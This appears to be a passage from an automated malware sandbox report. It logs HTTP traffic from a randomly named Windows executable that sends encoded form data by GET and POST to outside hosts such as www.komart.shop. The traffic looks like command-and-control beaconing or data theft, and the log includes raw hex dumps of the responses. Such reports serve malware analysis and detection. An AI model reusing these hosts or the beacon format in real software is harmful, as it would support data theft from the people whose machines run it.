                                                                                                                                              Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?DF:KWEJjf*pZA-fdr_5a
                                                                                                                                              Oct 4, 2024 08:09:48.428129911 CEST1289INData Raw: fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82 f3 e6 a1 2f 56 62 3d b7 38 02 fa d9 fb 11 24 df df e4 e5 0d ea c1 4d 2b fe df eb 9c 2c 46 44 14 68 69 c9 74 fa f3 70 db 76 f1
                                                                                                                                              Data Ascii: AdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}xx!YvOU<<<) =7IRQ9v?:9h
                                                                                                                                              Oct 4, 2024 08:09:48.428141117 CEST1289INData Raw: 28 71 2d b5 f7 f6 2e b0 5c d8 59 72 e8 af 20 23 b0 c2 67 a8 b0 b8 80 e1 a2 b2 f6 ef 3d 66 70 b2 d3 6d 33 a1 94 d9 cc 54 9e 46 72 44 d1 48 7d f8 1a ea 98 b3 a3 f0 34 a7 97 9e 1e 8b b9 53 9e 4f 79 31 e5 e5 94 56 ca 5a 7e 59 39 2b 96 d8 41 c1 e6 eb
                                                                                                                                              Data Ascii: (q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hv
                                                                                                                                              Oct 4, 2024 08:09:48.428153038 CEST1289INData Raw: ca 93 fa d9 7e 4d c3 77 c8 80 9d 86 21 6b 45 d0 60 82 52 d1 db 4b e9 60 5c 73 45 59 d7 a0 9b dc 9a d2 e8 71 43 11 99 2b 53 9e 17 e8 25 0d c6 28 5f 19 4a df 62 a1 6d 0d d3 f2 96 b7 5c d7 20 61 31 fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f
                                                                                                                                              Data Ascii: ~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxE
                                                                                                                                              Oct 4, 2024 08:09:48.428165913 CEST1289INData Raw: e5 0f 0c e6 9d c0 8e 5d ea a1 e4 68 b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff
                                                                                                                                              Data Ascii: ]hP2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>
                                                                                                                                              Oct 4, 2024 08:09:48.428184986 CEST1289INData Raw: 77 f3 46 f4 7a 9f db 34 55 2e c2 f7 f9 78 8c 09 6e 61 8e cb 05 65 67 b9 de 6f 04 7e 92 94 72 56 ac 9c 26 a9 40 49 64 b1 1a f3 24 3d c9 d4 b4 9e 64 ea 91 93 51 34 be 1f 42 c5 2d c8 52 d6 d5 84 02 fb 9e d6 dc 82 2e b9 d9 16 72 0b 88 06 5c 42 7a 61
                                                                                                                                              Data Ascii: wFz4U.xnaego~rV&@Id$=dQ4B-R.r\Bza4:YszB'S/O)!P/53uG$)OQ]Hu;0_3fQ880{p(K"&'+xPJcUET5n
                                                                                                                                              Oct 4, 2024 08:09:48.428268909 CEST1289INData Raw: bb 50 50 39 84 2d b4 72 8a 37 07 dc ca 29 df fa 62 92 52 21 00 5b 7a f7 85 d2 b2 96 90 bc d0 28 9d 58 e2 e4 85 3e f9 64 f9 95 50 04 78 c1 ab 86 6a 2a ea cf a5 31 4f 63 4b 65 de 0a 9f 65 69 73 ba d0 3c 2a 4b 97 ff 85 36 3b e6 8a a1 91 e1 21 af 0c
                                                                                                                                              Data Ascii: PP9-r7)bR![z(X>dPxj*1OcKeeis<*K6;!QCf,F;Ondd2pv9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d
                                                                                                                                              Oct 4, 2024 08:09:48.428277016 CEST1289INData Raw: 55 f5 c8 cd 97 09 cd 7b 76 1f 99 78 b5 cf a5 36 7c 14 da fe 3c fd 4c 3c 39 fd 03 22 f7 ba ea f0 7b 02 aa 69 02 8a e9 f3 29 79 5a 9c d2 49 5f 61 8e b1 24 6f 43 19 f7 1b aa 7b 15 29 15 ed 35 bf 0e d9 98 69 1c e7 5a 37 c2 d7 3e 34 5d ad 7b dd c9 4a
                                                                                                                                              Data Ascii: U{vx6|<L<9"{i)yZI_a$oC{)5iZ7>4]{J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@g
                                                                                                                                              Oct 4, 2024 08:09:48.428437948 CEST1289INData Raw: 15 09 ae 47 02 a1 d1 21 f6 0a cd ea be 21 bb 3b 87 75 80 73 45 16 04 2e 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58
                                                                                                                                              Data Ascii: G!!;usE.Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOM


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              45192.168.11.2049775103.21.221.4804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:50.636223078 CEST557OUTGET /iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:09:51.194473982 CEST530INHTTP/1.1 301 Moved Permanently
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              x-redirect-by: WordPress
                                                                                                                                              location: http://tempatmudisini01.click/iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0
                                                                                                                                              x-litespeed-cache: miss
                                                                                                                                              content-length: 0
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:51 GMT
                                                                                                                                              server: LiteSpeed


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              46192.168.11.2049776133.130.35.90804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:57.592662096 CEST804OUTPOST /qwk1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Origin: http://www.komart.shop
                                                                                                                                              Referer: http://www.komart.shop/qwk1/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 78 61 36 66 6a 41 73 52 38 30 6f 73 79 6c 7a 65 64 74 68 6e 70 35 62 34 32 79 72 51 73 4b 41 6d 34 61 37 6b 75 76 4a 74 41 67 54 77 5a 31 55 38 54 64 55 6d 2f 58 74 35 76 4c 4f 66 62 59 55 44 35 65 74 41 4b 34 42 4e 6b 45 42 48 6e 65 31 5a 56 74 73 30 54 41 5a 47 76 56 51 48 49 71 52 49 2f 4c 32 63 79 42 4a 4f 35 42 64 42 75 65 58 52 44 39 58 66 6e 71 76 6a 54 74 6d 65 36 72 65 4b 53 72 70 68 2f 74 31 66 48 36 54 38 61 59 6d 2b 6e 57 66 65 54 36 75 73 2f 6b 53 31 59 79 62 41 2b 6f 30 67 55 51 57 70 4f 32 72 43 69 71 62 6c 30 44 6e 49 77 3d 3d
                                                                                                                                              Data Ascii: oz=+s6bZXAYHnamcxa6fjAsR80osylzedthnp5b42yrQsKAm4a7kuvJtAgTwZ1U8TdUm/Xt5vLOfbYUD5etAK4BNkEBHne1ZVts0TAZGvVQHIqRI/L2cyBJO5BdBueXRD9XfnqvjTtme6reKSrph/t1fH6T8aYm+nWfeT6us/kS1YybA+o0gUQWpO2rCiqbl0DnIw==
                                                                                                                                              Oct 4, 2024 08:09:57.888267040 CEST668INHTTP/1.1 404 Not Found
                                                                                                                                              content-encoding: gzip
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:57 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 454
                                                                                                                                              connection: close
                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                                              Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              47192.168.11.2049777133.130.35.90804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:00.405117035 CEST824OUTPOST /qwk1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Origin: http://www.komart.shop
                                                                                                                                              Referer: http://www.komart.shop/qwk1/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 51 4b 36 51 67 6f 73 57 63 30 72 31 43 6c 7a 48 74 73 6d 6e 75 78 62 34 79 71 37 52 65 75 41 6d 64 2b 37 6c 71 44 4a 71 41 67 54 34 35 31 64 6a 44 63 35 6d 2f 61 4e 35 71 72 4f 66 62 4d 55 44 34 75 74 42 38 77 47 4d 30 45 48 4c 48 65 37 64 56 74 73 30 54 41 5a 47 73 70 70 48 49 79 52 49 71 44 32 64 51 70 4b 56 5a 42 53 43 75 65 58 56 44 39 54 66 6e 72 4b 6a 53 77 44 65 34 6a 65 4b 54 62 70 6d 72 42 36 51 48 36 76 6a 4b 5a 58 76 30 33 49 53 67 37 54 6a 39 46 50 7a 37 43 47 42 6f 35 75 39 6d 6b 79 71 64 71 5a 47 53 54 7a 6e 32 43 38 56 33 35 76 70 77 77 42 70 79 4e 77 36 58 48 6d 37 39 57 78 46 44 4d 3d
                                                                                                                                              Data Ascii: oz=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7ReuAmd+7lqDJqAgT451djDc5m/aN5qrOfbMUD4utB8wGM0EHLHe7dVts0TAZGsppHIyRIqD2dQpKVZBSCueXVD9TfnrKjSwDe4jeKTbpmrB6QH6vjKZXv03ISg7Tj9FPz7CGBo5u9mkyqdqZGSTzn2C8V35vpwwBpyNw6XHm79WxFDM=
                                                                                                                                              Oct 4, 2024 08:10:00.688692093 CEST668INHTTP/1.1 404 Not Found
                                                                                                                                              content-encoding: gzip
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:10:00 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 454
                                                                                                                                              connection: close
                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                                              Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              48192.168.11.2049778133.130.35.90804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:03.216897011 CEST1289OUTPOST /qwk1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Origin: http://www.komart.shop
                                                                                                                                              Referer: http://www.komart.shop/qwk1/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 51 4b 36 51 67 6f 73 57 63 30 72 31 43 6c 7a 48 74 73 6d 6e 75 78 62 34 79 71 37 52 65 6d 41 6d 76 32 37 6c 4e 58 4a 72 41 67 54 79 5a 31 59 6a 44 63 42 6d 2f 53 53 35 71 76 6b 66 5a 30 55 44 65 79 74 56 5a 51 47 47 30 45 48 55 33 65 36 5a 56 74 31 30 54 51 64 47 76 52 70 48 49 79 52 49 74 7a 32 61 43 42 4b 53 70 42 64 42 75 65 44 52 44 39 33 66 6a 48 38 6a 53 6b 39 65 4c 62 65 50 44 4c 70 6a 59 35 36 5a 48 36 70 69 4b 5a 50 76 30 36 50 53 67 6d 71 6a 2b 59 61 7a 35 69 47 44 39 51 66 6c 45 6b 70 34 50 71 37 45 67 54 36 7a 48 47 71 57 48 78 79 73 58 56 68 6f 45 56 63 34 42 54 55 6f 34 2b 67 55 57 42 7a 4d 38 52 47 73 42 66 53 45 52 6b 4c 70 79 2f 75 6f 4c 31 4a 49 55 51 2f 67 70 2b 7a 77 2b 77 74 61 6d 78 4a 71 72 67 30 4f 6e 35 42 2b 77 58 34 31 73 62 78 74 42 6e 58 75 2b 42 36 68 76 47 33 77 47 75 2f 4d 6b 6e 52 75 43 73 56 64 47 66 6a 72 79 70 6a 35 34 58 50 39 6f 79 31 76 65 58 58 68 6c 67 69 63 75 55 68 6f 57 58 70 64 68 6c 78 6c 61 30 74 54 37 42 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7RemAmv27lNXJrAgTyZ1YjDcBm/SS5qvkfZ0UDeytVZQGG0EHU3e6ZVt10TQdGvRpHIyRItz2aCBKSpBdBueDRD93fjH8jSk9eLbePDLpjY56ZH6piKZPv06PSgmqj+Yaz5iGD9QflEkp4Pq7EgT6zHGqWHxysXVhoEVc4BTUo4+gUWBzM8RGsBfSERkLpy/uoL1JIUQ/gp+zw+wtamxJqrg0On5B+wX41sbxtBnXu+B6hvG3wGu/MknRuCsVdGfjrypj54XP9oy1veXXhlgicuUhoWXpdhlxla0tT7BiQeelXB9c+H2yiLp59BTe0bZeWluQG/9ynjchzbnJnazrwgwiOy3g3WgKIWKCtnTTBWbi+FEyF8j8xxkCMjXuKfU2w5lVPH/Bboi9kxpM+/RZ6cwXWwWQWPoMZ45T3YLR3DhD8dUXPErp5NW5iNCkymjAJvmykjqTXyWCy68hyviYh3Dqix1LX0gSAsUvMBNzXCvf++VPZxQEQHEor/8fwzZyeujzH9z+OsrbokYk1Xqec7qEedFCxRpJwct1maXxKfXzG1L5s1In8y9dy02aG3Gat9t3DzKX9VYooJtolN+PC3c90Rylk/jSC8bbfd7I3I+tAkz8iiCgUMa8y2eJNK6F
                                                                                                                                              Oct 4, 2024 08:10:03.216944933 CEST1289OUTData Raw: 31 74 39 61 48 55 61 75 4d 32 78 54 4e 7a 39 39 6b 33 78 55 4e 61 30 52 42 6b 4f 6f 74 49 61 41 66 56 63 5a 5a 52 38 69 4f 34 36 79 44 50 30 45 41 6a 58 7a 62 37 63 37 2f 44 48 48 59 6b 76 66 47 54 70 41 74 35 63 31 65 33 5a 66 4c 41 53 57 70 2f
                                                                                                                                              Data Ascii: 1t9aHUauM2xTNz99k3xUNa0RBkOotIaAfVcZZR8iO46yDP0EAjXzb7c7/DHHYkvfGTpAt5c1e3ZfLASWp/JF6jv6epgOp9GrDJo+VkDYFWCx9JtkXG9me1UcBVyR24l5SQSdhzWZspXgaGdS/IxmMoYab+4fdQwdtxOovlM3NISPcXV/AhHO18c4jNv4rK5rJkPXHgMWiOgWXMEZaTfFDBvk2+Tvb2L8GYUGCuFEXqD8ZhFFpTt
                                                                                                                                              Oct 4, 2024 08:10:03.216995955 CEST5395OUTData Raw: 74 73 69 44 2f 2b 32 35 6f 55 55 4c 6b 33 6f 35 39 56 70 6b 71 34 36 2f 75 6a 4c 63 57 52 66 31 37 41 66 53 72 6f 6f 56 74 45 31 56 73 4c 73 45 49 75 51 30 53 47 30 4a 48 74 62 54 7a 37 52 2b 71 69 54 39 4b 4d 79 51 53 43 38 76 36 4d 34 49 41 70
                                                                                                                                              Data Ascii: tsiD/+25oUULk3o59Vpkq46/ujLcWRf17AfSrooVtE1VsLsEIuQ0SG0JHtbTz7R+qiT9KMyQSC8v6M4IApByBplxzKJaIph49xGB18aztzpfN/reYSa7+O6200PFH9kKby2Xymu7VwuU3gB08Itpah3JcE5IhMftCmgyHqd/MeHCmWY+j7AAD+aOxvvAYL35CCyrlRZD3y0D8IjMa19fktTBb6qJyDfhPzJ5D7U5fQAnBFyX4yf
                                                                                                                                              Oct 4, 2024 08:10:03.566906929 CEST668INHTTP/1.1 404 Not Found
                                                                                                                                              content-encoding: gzip
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:10:03 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 454
                                                                                                                                              connection: close
                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                                              Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              49192.168.11.2049779133.130.35.90804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:06.026305914 CEST546OUTGET /qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:10:06.308583021 CEST883INHTTP/1.1 404 Not Found
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:10:06 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 693
                                                                                                                                              connection: close
